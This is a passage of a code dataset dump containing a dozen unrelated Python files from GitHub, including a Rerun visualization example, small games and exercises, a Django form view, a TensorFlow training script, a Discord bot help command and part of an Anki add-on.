in zip(keypoint_ids, keypoint_pos2s):\n rr.log(\n f\"world/camera/estimates/box-{obj_ann.object_id}/{id}\",\n rr.Points2D(pos2, colors=[130, 160, 250, 255]),\n )\n\n\n# TODO(#3412): replace once we can auto project 3D bboxes on 2D views (need blueprints)\ndef log_projected_bbox(path: str, keypoints: npt.NDArray[np.float32]) -> None:\n \"\"\"\n Projects the 3D bounding box to a 2D plane, using line segments.\n\n The 3D bounding box is described by the keypoints of an `ObjectAnnotation`\n \"\"\"\n # fmt: off\n segments = np.array([[keypoints[1], keypoints[2]],\n [keypoints[1], keypoints[3]],\n [keypoints[4], keypoints[2]],\n [keypoints[4], keypoints[3]],\n\n [keypoints[5], keypoints[6]],\n [keypoints[5], keypoints[7]],\n [keypoints[8], keypoints[6]],\n [keypoints[8], keypoints[7]],\n\n [keypoints[1], keypoints[5]],\n [keypoints[2], keypoints[6]],\n [keypoints[3], keypoints[7]],\n [keypoints[4], keypoints[8]]], dtype=np.float32)\n # fmt: on\n rr.log(path, rr.LineStrips2D(segments, colors=[130, 160, 250, 255]))\n\n\ndef main() -> None:\n # Ensure the logging in download_dataset.py gets written to stderr:\n logging.getLogger().addHandler(logging.StreamHandler())\n logging.getLogger().setLevel(\"INFO\")\n\n parser = argparse.ArgumentParser(description=\"Logs Objectron data using the Rerun SDK.\")\n parser.add_argument(\n \"--frames\", type=int, default=sys.maxsize, help=\"If specified, limits the number of frames logged\"\n )\n parser.add_argument(\"--run-forever\", action=\"store_true\", help=\"Run forever, continually logging data.\")\n parser.add_argument(\n \"--per-frame-sleep\", type=float, default=0.1, help=\"Sleep this much for each frame read, if --run-forever\"\n )\n parser.add_argument(\n \"--recording\",\n type=str,\n choices=AVAILABLE_RECORDINGS,\n default=AVAILABLE_RECORDINGS[1],\n help=\"The objectron recording to log to Rerun.\",\n )\n parser.add_argument(\n \"--force-reprocess-video\",\n action=\"store_true\",\n help=\"Reprocess video frames even if they already exist\",\n )\n parser.add_argument(\n \"--dataset_dir\", type=Path, default=LOCAL_DATASET_DIR, help=\"Directory to save example videos to.\"\n )\n\n rr.script_add_args(parser)\n args = parser.parse_args()\n\n rr.script_setup(args, \"rerun_example_objectron\")\n\n dir = ensure_recording_available(args.recording, args.dataset_dir, args.force_reprocess_video)\n\n samples = read_ar_frames(dir, args.frames, args.run_forever, args.per_frame_sleep)\n seq = read_annotations(dir)\n log_ar_frames(samples, seq)\n\n rr.script_teardown(args)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rerun-io/rerun","sub_path":"examples/python/objectron/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9702,"program_lang":"python","lang":"en","doc_type":"code","stars":3502,"dataset":"github-code","pt":"38"} +{"seq_id":"37953124818","text":"#Name of File: damagetext.py\n#Purpose: Implements text of fight that shows that a hit has been landed and decreased the health of one of the in-game sprites\n#Version and Date: Version 1, last updated March 2021\n#Author(s): Ashton Foster\n#Dependencies: pygame\n\nimport pygame\n\nclass DamageText(pygame.sprite.Sprite):\n def __init__(self, x, y, damage, color):\n pygame.sprite.Sprite.__init__(self)\n self.font = pygame.font.Font(None, 35) #setting font\n self.image = self.font.render(damage, True, color)\n self.rect = self.image.get_rect()\n self.rect.center = (x, y)\n self.counter = 0\n\n def getCounter(self):\n return self.counter\n\n def update(self):\n # move damage text\n 
self.rect.y -= 1\n # delete text after time\n self.counter += 1\n if self.counter > 25:\n self.kill()\n","repo_name":"rmoroz20/Klassic-Karole-CI102-103-Project","sub_path":"damagetext.py","file_name":"damagetext.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"39412154002","text":"import pandas as pd\nimport numpy as np\n\nwith open('TestLog.txt') as file:\n i=0\n data=[]\n for line in file:\n s=line.split()\n data.append(s)\ndata_df = pd.DataFrame(data)\ndata_df.columns= ['Distance','Vertical','Horizontal']\ndata_df\n","repo_name":"wittyatom/DataMining","sub_path":"datacleaningsample.py","file_name":"datacleaningsample.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"70087434990","text":"import numpy as np\r\nimport pandas as pd\r\nimport math\r\n\r\nclass EVALUATION():\r\n\r\n def __init__(self,estimated_rating_matrix, recommmendation_size, recommendation_list, train_dataset, valid_items, test_dataset):\r\n self.recommendation_size = recommmendation_size\r\n self.estimated_rating_matrix = estimated_rating_matrix\r\n self.recommendation_list = recommendation_list\r\n self.train_dataset = train_dataset\r\n self.test_dataset = test_dataset\r\n self.valid_items = valid_items\r\n\r\n self.user_size = len(self.recommendation_list.keys())\r\n\r\n def MERICS_01(self):\r\n self.avi_test_dataset_size = 0\r\n self.total_hits = 0\r\n self.total_NDCG = 0\r\n self.total_abs_deviation_of_ratings = 0\r\n self.total_square_deviation_of_ratings = 0\r\n\r\n for row in self.test_dataset.iloc():\r\n if row[0] in self.recommendation_list.keys() and row[1] in self.valid_items: # 修复BUG:别忘了item也必须要在训练集中出现过才行哦!\r\n self.avi_test_dataset_size += 1\r\n if row[1] in self.recommendation_list[row[0]].values:\r\n self.total_hits += 1\r\n list_for_this_user = self.recommendation_list[row[0]].values.tolist()\r\n posi = list_for_this_user.index(row[1])\r\n self.total_NDCG += np.reciprocal(np.log2(posi + 2)) # np.reciprocal()函数返回参数逐元素的倒数(这里+2是因为索引位置从0开始的吧,否则会出现分母=log2(1)=0的情况)\r\n\r\n # 修复BUG:下面这里还要算上没有命中的那一部分!如果只算命中的,当然误差很小啦!!\r\n self.total_abs_deviation_of_ratings += abs(self.estimated_rating_matrix.loc[row[0],row[1]] - row[2])\r\n self.total_square_deviation_of_ratings += (self.estimated_rating_matrix.loc[row[0],row[1]] - row[2])**2\r\n\r\n self.Precision = self.total_hits / (self.recommendation_size * self.user_size)\r\n self.HR = self.total_hits / self.avi_test_dataset_size\r\n self.MAE = self.total_abs_deviation_of_ratings / self.avi_test_dataset_size\r\n self.RMSE = math.sqrt(self.total_square_deviation_of_ratings / self.avi_test_dataset_size)\r\n self.NDCG = self.total_NDCG / self.avi_test_dataset_size\r\n\r\n return self.Precision, self.HR, self.NDCG, self.MAE, self.RMSE\r\n\r\n # 下面是METRICS_02,因为按照我的评分矩阵的布局,只要是出现在训练集中的,都给了个无穷大的负值,所以FP一定等于0,这是不是一般都不用precision, recall, F1那些指标的原因呢?\r\n '''\r\n def METRICS_02(self):\r\n # 下面的数据都是将在Metrics中共用的信息\r\n self.size_of_train_dataset = self.train_dataset.shape[0]\r\n self.size_of_test_dataset = self.test_dataset.shape[0] # 注意shape后面是[]而不是()\r\n self.size_of_recommendation_list = len(self.recommendation_list) * self.recommendation_size # len(dict)可用于返回字典\"键\"的个数\r\n self.TP = 0\r\n self.FP = 0\r\n self.TN = 0\r\n self.FN = 0\r\n self.abs_deviation_of_ratings = 0\r\n self.square_deviation_of_ratings = 0\r\n\r\n for row in self.test_dataset.iloc():\r\n if row['user'] in 
self.recommendation_list.keys():\r\n if row['item'] in self.recommendation_list[row['user']].values: # dict.items()输出的是整个字典,所以这里要这样判断\r\n self.TP = self.TP + 1\r\n self.abs_deviation_of_ratings = self.abs_deviation_of_ratings + abs(self.estimated_rating_matrix.loc[row['user'], row['item']] - row['rating'])\r\n self.square_deviation_of_ratings = self.square_deviation_of_ratings + (self.estimated_rating_matrix.loc[row['user'],row['item']] - row['rating'])**2\r\n else:\r\n self.TN = self.TN + 1\r\n\r\n for row in self.train_dataset.iloc():\r\n if row['user'] in self.recommendation_list.keys():\r\n if row['item'] in self.recommendation_list[row['user']].values:\r\n self.FP = self.FP + 1\r\n else:\r\n self.FN = self.FN + 1\r\n\r\n\r\n # print('TP=',self.TP, 'TN=', self.TN, 'FP=', self.FP, 'FN=', self.FN)\r\n # print('list_size=',self.size_of_recommendation_list,'TP+FP=', self.TP + self.FP)\r\n # print('not_list_size=', self.size_of_train_dataset - self.size_of_recommendation_list, 'TN+FN=', self.TN + self.FN)\r\n # print('train_dataset_size=', self.size_of_train_dataset, 'FP+FN=', self.FP + self.FN)\r\n # print('test_dataset_size=', self.size_of_test_dataset, 'TP+TN=',self.TP + self.TN)\r\n\r\n # 以下是指标的计算\r\n self.precision = self.TP / (self.TP + self.FP)\r\n self.recall = self.TP / (self.TP + self.FN)\r\n self.F1 = (2 * self.precision * self.recall) / (self.precision + self.recall)\r\n self.MAE = (1 / self.size_of_test_dataset) * self.abs_deviation_of_ratings # 这里有BUG,应该用参与比较的那些test来作为分母!\r\n self.RMAE = math.sqrt((1 / self.size_of_test_dataset)* self.square_deviation_of_ratings)\r\n\r\n return self.precision, self.recall, self.F1, self.MAE, self.RMAE\r\n '''","repo_name":"pitteryue/Recommender-Systems","sub_path":"evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":5548,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"} +{"seq_id":"3121320873","text":"\n\"\"\"\nImportaciones \n\"\"\"\nfrom datetime import datetime\nfrom multiprocessing.dummy.connection import Client\nfrom django.http import HttpResponse \nfrom django.template import loader\nfrom .models import ClientePasaje\nfrom django.urls import reverse \nfrom django.shortcuts import HttpResponseRedirect \n\n\"\"\"\nFuncion home, tiene la finalidad de conectar a la plantilla \ninscripcionpasaje con el proyecto\n\"\"\"\ndef home(request):\n template = loader.get_template('inscripcionpasaje.html') \n client = ClientePasaje.objects.all().values()\n context = { \n 'client':client,\n }\n return HttpResponse(template.render(context,request))\n\"\"\"\nFuncion confirmarinscripcionpasaje, tiene la función de pasar los datos ingresados a la base de datos e \nimprimirlo dentro de la plantilla confirmarinscripcionpasaje\n\"\"\"\ndef confirmacioninscripcionpasaje(request):\n x = request.POST['nombre'] \n y = request.POST['direccion'] \n z = request.POST['correo'] \n a = request.POST['contraseña'] \n b = request.POST['Mes'] \n c = request.POST['Dia'] \n d = request.POST['año'] \n e = request.POST['gender'] \n f = request.POST['aficiones'] \n g = request.POST.getlist('inter[]')\n if (int(datetime.now().date().strftime(\"%Y\"))-int(d)>=18):\n member = ClientePasaje(Nombre=x, Correo_Electronico=z, Dirección=y, Contraseña=a, \n FechaNac= c+\"/\"+b+\"/\"+d, Sexo=e, Aficiones=f, Intereces=g, Precio=1000) \n member.save() \n elif (int(datetime.now().date().strftime(\"%Y\"))-int(d)<18 and int(datetime.now().date().strftime(\"%Y\"))-int(d)>2):\n member = ClientePasaje(Nombre=x, 
Correo_Electronico=z, Dirección=y, Contraseña=a, \n FechaNac= c+\"/\"+b+\"/\"+d, Sexo=e, Aficiones=f, Intereces=g, Precio=750) \n member.save() \n elif (int(datetime.now().date().strftime(\"%Y\"))-int(d)<=2):\n member = ClientePasaje(Nombre=x, Correo_Electronico=z, Dirección=y, Contraseña=a, \n FechaNac= c+\"/\"+b+\"/\"+d, Sexo=e, Aficiones=f, Intereces=g, Precio=0) \n member.save() \n misclientes = ClientePasaje.objects.get(id=member.id) \n template = loader.get_template('confirmacioninscripcionpasaje.html') \n context = {\n 'misclientes': misclientes,\n } \n return HttpResponse(template.render(context, request)) \n\n\n \n","repo_name":"CinthyaYanarico/Practica_10","sub_path":"DjangoPr10/PyPsjaereo/appinscripcion/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"10295163512","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n# pylint: disable=missing-docstring\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport random\nimport gzip\nimport os\nimport re\nimport sys\n\nimport tensorflow as tf\nimport svhn\n\nFLAGS = tf.app.flags.FLAGS\n\ntf.app.flags.DEFINE_string('train_dir', 'trained_models',\n \"\"\"Directory where to write event logs \"\"\"\n \"\"\"and checkpoint.\"\"\")\ntf.app.flags.DEFINE_integer('max_steps', 101,\n \"\"\"Number of batches to run.\"\"\")\ntf.app.flags.DEFINE_boolean('log_device_placement', False,\n \"\"\"Whether to log device placement.\"\"\")\n\n\ndef train():\n\n with tf.Graph().as_default():\n # Get data and labels\n SVHN_data = svhn.get_data()\n train_dataset = SVHN_data['train_dataset']\n train_labels = SVHN_data['train_labels']\n valid_dataset = SVHN_data['valid_dataset']\n valid_labels = SVHN_data['valid_labels']\n test_dataset = SVHN_data['test_dataset']\n test_labels = SVHN_data['test_labels']\n\n # Input data.\n tf_train_dataset = tf.placeholder(tf.float32, shape=(FLAGS.BATCH_SIZE, FLAGS.IMAGE_SIZE, FLAGS.IMAGE_SIZE, FLAGS.NUM_CHANNELS))\n tf_train_labels = tf.placeholder(tf.int64, shape=(FLAGS.BATCH_SIZE, FLAGS.N+1))\n tf_valid_dataset = tf.constant(valid_dataset)\n tf_test_dataset = tf.constant(test_dataset)\n\n # Build a Graph that computes the logits predictions from the\n # inference model.\n CNN = svhn.CNN()\n logits = CNN.inference(tf_train_dataset)\n\n # Calculate loss.\n loss = CNN.loss(logits, tf_train_labels)\n\n # Build a Graph that trains the model with one batch of examples and\n # updates the model parameters.\n optimizer = CNN.train(loss)\n\n # Preds to estimate\n train_prediction = CNN.predict(tf_train_dataset)\n test_prediction = CNN.predict(tf_test_dataset)\n valid_prediction = CNN.predict(tf_valid_dataset)\n\n # Create a saver.\n saver = tf.train.Saver(tf.all_variables())\n\n # Build an initialization operation to run below.\n init = 
tf.initialize_all_variables()\n\n # Start running operations on the Graph.\n sess = tf.Session(config=tf.ConfigProto(\n log_device_placement=FLAGS.log_device_placement))\n sess.run(init)\n\n saver.restore(sess, os.path.join(FLAGS.train_dir, 'model.ckpt'))\n print('Model Restored')\n #print('Initialized')\n\n for step in range(FLAGS.max_steps):\n offset = (step * FLAGS.BATCH_SIZE) % (train_labels.shape[0] - FLAGS.BATCH_SIZE)\n batch_data = train_dataset[offset:(offset + FLAGS.BATCH_SIZE), :, :, :]\n batch_labels = train_labels[offset:(offset + FLAGS.BATCH_SIZE),:]\n feed_dict = {tf_train_dataset : batch_data, tf_train_labels : batch_labels}\n _, l, predictions = sess.run(\n [optimizer, loss, train_prediction], feed_dict=feed_dict)\n if (step % 5000 == 0):\n print('Minibatch loss at step %d: %f' % (step, l))\n # Commented partial estimation to improve the performance of the training computation\n #print('Minibatch accuracy: %.1f%%' % svhn.accuracy(predictions, batch_labels))\n #print('Validation accuracy: %.1f%%' % svhn.accuracy(valid_prediction.eval(session=sess), valid_labels))\n\n print('Out of training')\n checkpoint_path = os.path.join(FLAGS.train_dir, 'model.ckpt')\n sr = saver.save(sess, checkpoint_path)\n print('Model Saved')\n #print('Evaluating the final performance')\n #print('Test accuracy: %.1f%%' % svhn.accuracy(test_prediction.eval(session=sess), test_labels))\n\n\ndef main(argv=None): # pylint: disable=unused-argument\n svhn.load_data()\n #if tf.gfile.Exists(FLAGS.train_dir):\n # tf.gfile.DeleteRecursively(FLAGS.train_dir)\n #tf.gfile.MakeDirs(FLAGS.train_dir, 0777) # force permissions\n train()\n\nif __name__ == '__main__':\n tf.app.run()\n","repo_name":"archelogos/sequence-detector","sub_path":"project/train-scripts/svhn_train.py","file_name":"svhn_train.py","file_ext":"py","file_size_in_byte":4462,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"38"} +{"seq_id":"39570403920","text":"import scipy as sp\nimport matplotlib.pyplot as plt\n\nplt.rcParams.update({'font.size': 18})\nplt.rcParams[\"figure.figsize\"] = (15,15)\n\nfile = open('stm.txt', 'r')\nheight=sp.empty([663, 676])\ni=0\nfor line in file:\n height[i]=line.split()\n i+=1\nplt.imshow(height)\nplt.title('(111) Silicon surface mapping using STM') \nplt.colorbar().set_label('Height (STM data)')\nplt.savefig('silicon.png')\nplt.show()\n","repo_name":"gsomani/computational-physics","sub_path":"HW1/GauravSomani_HW1/13/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"38456606672","text":"import discord\nfrom discord.ext import commands\n\n\nclass Help(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.color = discord.Color.red()\n\n @commands.command()\n async def help(self, ctx, command=None):\n if not command:\n await self.send_all_commands(ctx)\n else:\n await self.send_specific_command(ctx, command)\n\n async def send_embed(self, ctx, title=None, description=None, color=None, url=None, timestamp=None, fields=None, thumbnail=None, image=None, author=None, footer=None, icon_url=None, proxy_icon_url=None):\n embed = discord.Embed(\n title=title,\n description=description,\n color=color,\n )\n if url:\n embed.url = url\n if timestamp:\n embed.timestamp = timestamp\n\n if fields:\n for name, value, inline in fields:\n embed.add_field(name=name, value=value, inline=inline)\n\n if thumbnail:\n embed.set_thumbnail(url=thumbnail)\n\n if 
image:\n embed.set_image(url=image)\n\n if author:\n embed.set_author(name=author, icon_url=icon_url, url=url)\n\n if footer:\n embed.set_footer(text=footer, icon_url=proxy_icon_url)\n\n await ctx.send(embed=embed)\n\n async def send_all_commands(self, ctx):\n embed = discord.Embed(\n title=\"Help\", description=\"List of available commands (non-slash)\", color=self.color)\n embed.set_thumbnail(url=self.bot.user.avatar)\n\n # Add Actions commands\n actions_cog = self.bot.get_cog(\"Actions\")\n actions_commands = [\n f\"`{command.name}`\" for command in actions_cog.get_commands()]\n actions_command_list = \" | \".join(actions_commands)\n embed.add_field(\n name=\"Actions\", value=actions_command_list, inline=False)\n\n # Add Emotes commands\n emotes_cog = self.bot.get_cog(\"Emotes\")\n emotes_commands = [\n f\"`{command.name}`\" for command in emotes_cog.get_commands()]\n emotes_command_list = \" | \".join(emotes_commands)\n embed.add_field(name=\"Emotes\", value=emotes_command_list, inline=False)\n util_list = [\"help\", \"info\",\n \"userinfo\", \"ping\", \"server\", \"invite\"]\n embed.add_field(name=\"Utils\", value=\" | \".join(\n [\"`{}`\".format(command) for command in util_list]), inline=False)\n embed.set_footer(\n text=f\"Requested by {ctx.author}\", icon_url=ctx.author.avatar)\n\n await ctx.send(embed=embed)\n\n async def send_specific_command(self, ctx, command):\n actions_cog = self.bot.get_cog(\"Actions\")\n emotes_cog = self.bot.get_cog(\"Emotes\")\n\n act = [i.name for i in actions_cog.get_commands()]\n if command in act:\n embed = discord.Embed()\n embed.title = 'Help ' + command\n embed.description = 'Action commands! \\nShow your actions!!\\n'\n embed.add_field(name='Other action commands',\n value=','.join(act), inline=False)\n embed.color = self.color\n embed.set_thumbnail(url=self.bot.user.avatar)\n embed.set_footer(\n text=f\"Requested by {ctx.author}\", icon_url=ctx.author.avatar)\n await ctx.send(embed=embed)\n\n eact = [i.name for i in emotes_cog.get_commands()]\n if command in eact:\n embed = discord.Embed()\n embed.title = 'Help ' + command\n embed.description = 'Emotion commands! 
\\nShow your emotions!!\\n'\n embed.add_field(name='Other emote commands',\n value=','.join(eact), inline=False)\n embed.color = self.color\n embed.set_thumbnail(url=self.bot.user.avatar)\n embed.set_footer(\n text=f\"Requested by {ctx.author}\", icon_url=ctx.author.avatar)\n await ctx.send(embed=embed)\n\n if command == 'server':\n await self.send_embed(ctx, 'Help Server', 'Shows server information', self.color, fields=[('Usage', '!server', False)], thumbnail=ctx.guild.icon, footer=f'Requested by {ctx.author}', proxy_icon_url=ctx.author.avatar)\n elif command == 'ping':\n await self.send_embed(ctx, 'Help Ping', 'Check the bot\\'s latency', self.color, fields=[('Usage', '!ping', False)], thumbnail=self.bot.user.avatar, footer=f'Requested by {ctx.author}', proxy_icon_url=ctx.author.avatar)\n elif command == 'userinfo':\n await self.send_embed(ctx, 'Help Userinfo', 'Display user information', self.color, fields=[('Usage', '!userinfo [user]', False)], thumbnail=ctx.author.avatar, footer=f'Requested by {ctx.author}', proxy_icon_url=ctx.author.avatar)\n elif command == 'info':\n await self.send_embed(ctx, 'Help Info', 'Display bot information', self.color, fields=[('Usage', '!info', False)], thumbnail=self.bot.user.avatar, footer=f'Requested by {ctx.author}', proxy_icon_url=ctx.author.avatar)\n elif command == 'invite':\n await self.send_embed(ctx, 'Help Invite', 'Get the bot\\'s invite link', self.color, fields=[('Usage', '!invite', False)], thumbnail=self.bot.user.avatar, footer=f'Requested by {ctx.author}', proxy_icon_url=ctx.author.avatar)\n else:\n await ctx.send(f\"Command `{command}` not found.\")\n","repo_name":"oxy-Op/oxemble-bot","sub_path":"commands/utils/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":5349,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"33308258862","text":"# 回文串\n# https://leetcode-cn.com/problems/valid-palindrome/\n# 给定一个字符串,验证它是否是回文串,只考虑字母和数字字符,可以忽略字母的大小写。\n#\n# 说明:本题中,我们将空字符串定义为有效的回文串。\n#\n#\n#\n# 示例\n# 1:\n#\n# 输入: \"A man, a plan, a canal: Panama\"\n# 输出: true\n# 解释:\"amanaplanacanalpanama\"\n# 是回文串\nclass Solution:\n\n def isPalindrome(self, s: str) -> bool:\n s_len = len(s)\n if s_len == 1:\n return True\n start = 0\n end = s_len - 1\n\n while start < end:\n if s[start].isalnum() is False:\n start += 1\n while s[start].isalnum() is False and start < end:\n start += 1\n\n if s[end].isalnum() is False:\n end -= 1\n while s[end].isalnum() is False and end > start:\n end -= 1\n\n if start > end:\n return True\n\n if s[start].lower() != s[end].lower():\n print( s[start], s[end])\n return False\n start += 1\n end -= 1\n\n return True\n\n\n\nt = Solution()\n# print(t.isPalindrome(\"A man, a plan, a canal: Panama\"))\nprint(t.isPalindrome(\".,\"))\nprint(\"a\".isalnum())","repo_name":"as543343879/gelin_python","sub_path":"leetcode/palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"2407454057","text":"# Вводим строку\n\ntext = input('Введите текст в виде строки: ')\n\n# Разбиваем строку на элементы и вносим в список\n\nmy_list = text.split()\n\n# Печатаем получившийся список\n\nprint(my_list)\n\n# Выводим элементы списка с нумерацией (не более 10-ти букв в слове)\n\nfor i in range(len(my_list)):\n print('{})'.format(i + 1), 
my_list[i][:10])\n","repo_name":"Arverkos/GeekBrains-Homeprojects","sub_path":"py_intro02/Lesson02.Task04.py","file_name":"Lesson02.Task04.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34155541614","text":"from socket import *\r\n\r\nserverPort = 12000\r\n\r\n#SOCK_DGRAM indicates udp transport\r\nserverSocket = socket(AF_INET, SOCK_DGRAM)\r\n\r\n#bind to port number 12000 for incoming connection\r\nserverSocket.bind(('', serverPort))\r\n\r\nprint(\" The server is ready to receive\")\r\n\r\nwhile True:\r\n \r\n #recieve the input from client\r\n message, clientAddress = serverSocket.recvfrom(2048)\r\n \r\n #convert bytes to string\r\n message = message.decode()\r\n \r\n modifiedMessage = message.upper()\r\n \r\n print(modifiedMessage)\r\n \r\n #send the modified message back to client\r\n serverSocket.sendto(modifiedMessage.encode(), clientAddress)","repo_name":"alanlyyy/Computer-Networking-Top-Down-Approach","sub_path":"UDPServer.py","file_name":"UDPServer.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"6994143467","text":"# encoding: utf-8\nfrom aqt import mw\nfrom aqt.qt import *\nfrom aqt.utils import showInfo, tooltip\n\nfrom .view import formguessids, window_to_front, set_combobox_from_config, immediate_redraw\nfrom .edict.search import search_edict\nfrom . import furigana\nimport anki\n\nclass GuessEDICTWindow(QDialog):\n instance = None\n\n @classmethod\n def open(cls, parent):\n if cls.instance is None:\n cls.instance = cls(parent)\n else:\n window_to_front(cls.instance)\n return cls.instance\n\n def closeEvent(self, evt):\n type(self).instance = None\n self.hide()\n evt.accept()\n\n def __init__(self, parent):\n QDialog.__init__(self)\n self.form = formguessids.Ui_Dialog()\n self.form.setupUi(self)\n\n self.form.guessButton.clicked.connect(self.on_click_guess_button)\n\n self.note_ids = parent.selected_notes()\n if not self.note_ids:\n showInfo('Please select cards first')\n self.close()\n return\n note_id = self.note_ids[0]\n note = mw.col.getNote(note_id)\n self.model = note.model()\n model_name = self.model['name']\n\n # restore state from configuration\n # model\n self.form.modelValue.setText(self.model['name'])\n self.update_fieldboxes() # fill combo boxes for selected model\n self.update_enabled()\n # field mapping\n field_names = [''] + [field['name'] for field in self.model['flds']]\n set_combobox_from_config(self.form.kanjiBox, field_names, 'guessedict_kanjiField')\n set_combobox_from_config(self.form.kanaBox, field_names, 'guessedict_kanaField')\n set_combobox_from_config(self.form.furiganaBox, field_names, 'guessedict_furiganaField')\n set_combobox_from_config(self.form.definitionBox, field_names, 'guessedict_definitionField')\n set_combobox_from_config(self.form.idBox, field_names, 'guessedict_idField')\n\n # events\n self.set_onChange_combobox(self.form.kanjiBox, 'guessedict_kanjiField')\n self.set_onChange_combobox(self.form.kanaBox, 'guessedict_kanaField')\n self.set_onChange_combobox(self.form.furiganaBox, 'guessedict_furiganaField')\n self.set_onChange_combobox(self.form.definitionBox, 'guessedict_definitionField')\n self.set_onChange_combobox(self.form.idBox, 'guessedict_idField')\n\n self.show()\n\n def set_onChange_combobox(self, combobox, config_key):\n def _(combobox):\n def onChange():\n mw.col.conf[config_key] = combobox.currentText() if 
combobox.currentIndex() != 0 else None\n                mw.col.setMod()\n                self.update_enabled()\n            return onChange\n        combobox.currentIndexChanged.connect(_(combobox))\n\n    def keyPressEvent(self, event):\n        if event.key() == Qt.Key_Escape:\n            self.close()\n\n    def onChangeModel(self):\n        mw.col.conf['guessedict_model'] = self.form.modelBox.currentText()\n        mw.col.setMod()\n        self.update_fieldboxes()\n        self.update_enabled()\n\n    def update_fieldboxes(self):\n        field_names = [''] + [field['name'] for field in self.model['flds']]\n\n        self.form.kanjiBox.clear()\n        self.form.kanaBox.clear()\n        self.form.furiganaBox.clear()\n        self.form.definitionBox.clear()\n        self.form.idBox.clear()\n\n        self.form.kanjiBox.addItems(field_names)\n        self.form.kanaBox.addItems(field_names)\n        self.form.furiganaBox.addItems(field_names)\n        self.form.definitionBox.addItems(field_names)\n        self.form.idBox.addItems(field_names)\n\n    def enough_fields_given(self):\n        ok = False\n        if mw.col.conf.get('guessedict_kanjiField'):\n            ok = True\n        if mw.col.conf.get('guessedict_kanaField'):\n            ok = True\n        if mw.col.conf.get('guessedict_furiganaField'):\n            ok = True\n        if not mw.col.conf.get('guessedict_idField'):\n            ok = False\n        return ok\n\n    def update_enabled(self):\n        self.form.guessButton.setEnabled(self.enough_fields_given())\n\n    def on_click_guess_button(self):\n        self.form.guessButton.setText('Guessing...')\n        immediate_redraw(self)\n        self.guess()\n        self.close()\n\n    def guess(self):\n        # get field names\n        kanji_field = mw.col.conf.get('guessedict_kanjiField')\n        kana_field = mw.col.conf.get('guessedict_kanaField')\n        furigana_field = mw.col.conf.get('guessedict_furiganaField')\n        definition_field = mw.col.conf.get('guessedict_definitionField')\n        id_field = mw.col.conf.get('guessedict_idField')\n\n        n_ignored = 0\n        n_guessed = 0\n        n_ambiguous = 0\n        for note_id in self.note_ids:\n            note = mw.col.getNote(note_id)\n\n            # gather information about kanji and kana\n            kanji = None\n            kana = None\n            if furigana_field:\n                kanji = furigana.kanji(note[furigana_field])\n                kana = furigana.kana(note[furigana_field])\n            elif kanji_field:\n                kanji = note[kanji_field]\n            elif kana_field:\n                kana = note[kana_field]\n\n            # gather information about definition\n            definition = None\n            if definition_field:\n                definition = note[definition_field]\n\n            # search\n            if kanji is not None:\n                words = search_edict(kanji)\n            elif kana is not None:\n                words = search_edict(kana)\n            else:\n                raise NotImplementedError\n\n            # filter words\n            if kanji is not None:\n                # or kanji == word.kanji ?\n                words = [word for word in words if kanji in word.writings + word.readings]\n            if kana is not None:\n                # or kana == word.kana ?\n                words = [word for word in words if kana in word.writings + word.readings]\n            if definition is not None:\n                words = [word for word in words if definition == word.get_meanings_html()]\n\n            # update note\n            if len(words) == 0: # not in EDICT\n                # can be found by filtering over id field\n                n_ignored += 1\n            elif len(words) == 1:\n                word, = words\n                note[id_field] = word.get_sequence_number()\n                n_guessed += 1\n            else: # several matches\n                note.addTag('ambiguous')\n                n_ambiguous += 1\n            note.flush()\n        mw.reset()\n\n        ignored = ngettext('{} card ignored.', '{} cards ignored.', n_ignored).format(n_ignored)\n        guessed = ngettext('{} card ID guessed.', '{} card IDs guessed.', n_guessed).format(n_guessed)\n        ambiguous = ngettext('{} card marked ambiguous.', '{} cards marked ambiguous.', n_ambiguous).format(n_ambiguous)\n        tooltip('
